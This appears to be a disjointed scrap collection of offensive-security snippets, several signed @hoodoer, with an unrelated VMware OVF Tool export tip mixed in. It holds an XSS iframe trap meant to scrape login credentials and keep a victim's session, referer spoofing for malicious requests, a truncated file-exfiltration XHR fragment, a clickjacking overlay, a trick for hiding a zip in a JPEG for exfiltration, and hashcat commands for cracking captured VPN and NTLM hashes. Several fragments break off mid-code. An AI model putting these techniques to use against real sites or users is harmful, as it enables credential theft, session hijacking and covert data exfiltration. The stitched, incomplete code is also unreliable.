alert('Click ok when you\'re ready to enter iframe trap');
// Example Credential scraper and
// XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// Frame the login page, and copy out the
// username and password fields.
// @hoodoer

alert('Click ok when you\'re ready to enter iframe trap');
// Example XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// While they surf around, they stick in your
// iFrame, and you keep their session and your XSS
// payload running.
// @hoodoer

There’s no GUI option to export a VM in OVA (Open Virtual Appliance) format in VMware Fusion, but there is a command-line method: the OVF Tool. The following provides a command-line synopsis.
$ cd /Applications/VMware\ Fusion.app/Contents/Library/VMware\ OVF\ Tool/
$ ./ovftool --acceptAllEulas \
> /Users/me/Documents/Virtual\ Machines.localized/TheVM.vmwarevm/TheVM.vmx \
> ~/Desktop/TheVM.ova
Opening VMX source: […]

// Save the current URL path to restore after making
// malicious request with faked referer header value
var savedPath = window.location.pathname;
var savedSearch = window.location.search;
// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');
// Send malicious request with faked referer header value

fileXhr.open("GET", fileUri);
fileXhr.send(null);
console.log("Getting ready to get a file and exfil...");
fileXhr.onreadystatechange = function()
{
if (fileXhr.readyState == XMLHttpRequest.DONE)
{
var responseData = encodeURIComponent(fileXhr.response);
var exfilData = btoa(responseData);

<html>
<style>
.overlay {
float: top;
position: absolute;
padding: 245px;
width: 250px;
clear: both;
}

cat nmapOutput.gnmap | grep -E -o '[0-9]{1,5}/open' | sort | uniq -c | sort -r | head -n 20 |
copy /b image.jpg+Exfiltration-test.zip New-Image.jpg.
Note that the '.' at the end of the command above matters: it's "New-Image.jpg." not "New-Image.jpg"
You can unzip the original zip file from the .jpg (on a Linux box)

IKE-PSK:
./hashcat -m 5300 vpn.psk ../PasswordLists/Top109Million-probable-v2.txt -a 0 -r rules/wtf.rule -O
Responder:
hashcat -m 5600 hashes\hash.txt password_list.txt -o cracked\cracked.txt -O -r rules/best64.rule
example:
./hashcat -m 5600 hashes.txt ../../VM\ Share/PasswordLists/rockyou.txt -o passwords.txt -O -r rules/best66.rule